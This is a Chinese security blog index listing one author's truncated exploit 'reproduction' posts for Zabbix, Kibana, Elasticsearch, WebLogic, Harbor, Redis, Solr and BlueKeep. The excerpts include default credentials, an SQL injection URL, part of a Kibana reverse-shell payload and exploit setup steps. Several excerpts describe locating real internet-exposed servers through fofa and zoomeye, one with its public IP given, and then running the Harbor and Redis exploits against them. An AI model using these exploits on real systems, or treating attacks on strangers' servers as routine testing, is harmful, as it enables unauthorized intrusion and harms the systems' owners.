漏洞复现
sojrs_sec
sojrses@163.com
展开
-
zabbix 漏洞收集总结
一: 弱口令/默认账号admin:zabbixAdmin:zabbixguest: 空二: sql注入(ave-2016-10134)版本2.2.x3.3.0-3.031http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_s...原创 2019-12-31 14:42:49 · 2797 阅读 · 0 评论 -
kibana 漏洞收集总结
一:cve-2019-7609 命令执行Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell访问http://ip:5601/app/timelion输入payload.es(*).props(label.__proto__.env.AAAA='...原创 2019-12-31 13:55:40 · 7732 阅读 · 0 评论 -
Elasticsearch 漏洞收集总结
一:未授权访问获取敏感信息/_cat/indices/_plugin/sql//_nodes/_search/_search?preety/_status二:目录遍历漏洞(cve-2015-3337)安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响/_cat/plugins:查看所有已安装的插件一般复现...原创 2019-12-31 13:12:41 · 7764 阅读 · 0 评论 -
ysoserial 动态调试
前言在尝试对cve-2018-2628反序列化漏洞做分析的时候,发现一个比较重要的概念是JRMP,而在ysoserial中已经实现了JRMP的客户端和服务端,所以想可以直接进行动态调试一下,大概了解下JRMP的机制,下面简单讲一下ysoserial的调试方法调试步骤:Cve-2018-2628需要开启JRMPListener以及JRMPClient,这里我以调试JRMPClient为例,参照...原创 2019-12-24 19:53:03 · 1551 阅读 · 0 评论 -
weblogic cve-2018-2628复现
前言前面有分析过cve-2017-10271的xml反序列化漏洞,这次挑了cve-2018-2628尝试着分析看看,相比较xml反序列化只要一个http包而言,T3协议的反序列化利用过程显得更加复杂一些,因此在正式分析之前,这里做个简单先把复现的过程记录一下环境被攻击机192.168.99.37Ubuntu16Vulhub攻击机Mac192.168.96.111复现步骤Ubu...原创 2019-12-24 16:03:17 · 925 阅读 · 0 评论 -
weblogic动态调试环境搭建
一:docker配置修改以支持远程调试Docker-compose.yml 添加8453端口,该端口会是远程调试端口Docker-compose up -d 下载并运行镜像修改weblogic配置文件以支持远程调试进入docker docker exec -it cve-2018-2628_weblogic_1 /bin/bash/root/Oracle/Middleware/user_...原创 2019-11-25 14:21:21 · 2871 阅读 · 0 评论 -
Harbor未授权创建管理员漏洞(CVE-2019-16097)
环境准备fofa搜索环境title="Harbor" && country=CN找到一个可用环境测试测试注册账号,填写账号信息后抓包POST /api/users HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/201001...原创 2019-09-30 16:31:18 · 2103 阅读 · 0 评论 -
redis4.x/5.x 基于主从复制 RCE 复现
环境准备这里我通过zoomeye找到一台服务器34.70.67.23,上面开了redis4.0.6服务准备exp 自己的vps 1.1.1.1git clone https://github.com/n0b0dyCN/redis-rogue-server编译exp.socd /root/redis/redis-rogue-server/RedisModulesSDK/expmake...原创 2019-09-30 15:53:09 · 482 阅读 · 0 评论 -
Redis未授权访问漏洞详解
环境搭建环境:centos7 gcc1:下载安装包wget http://download.redis.io/releases/redis-3.2.6.tar.gz2:解压安装包到指定文件tar zxvf redis-3.2.6.tar.gz -C /usr/local3:cd /usr/local/redis-3.2.64:make 进行编译5:cd src &&...原创 2019-09-19 15:40:08 · 2574 阅读 · 0 评论 -
windows_cve_2019_0708 exp复现
环境kali 192.168.1.10安装msf cve_2019_0708 exp,下载地址链接:https://pan.baidu.com/s/1_A8AtsEalYt6q85cd5cdRw 密码:7zk6下载exp,添加到kali自带到msf中,msf首先要升级到v5以上升级命令 apt install metasploit-framework网盘中共4个文件,分别放入msf目...原创 2019-11-25 09:56:28 · 884 阅读 · 0 评论 -
solr远程命令执行(cve-2019-0193)
影响范围:apache solo < 8.2solr默认使用端口为8983一:获取solr索引库core的名称http://192.168.96.79:8983/solr/admin/cores查看name字段为atom二:判断该索引库是否使用dataimporthandler模块Atom为根据一找到的库名http://192.168.96.79:8983/solr/atom...原创 2019-08-15 14:02:32 · 2482 阅读 · 1 评论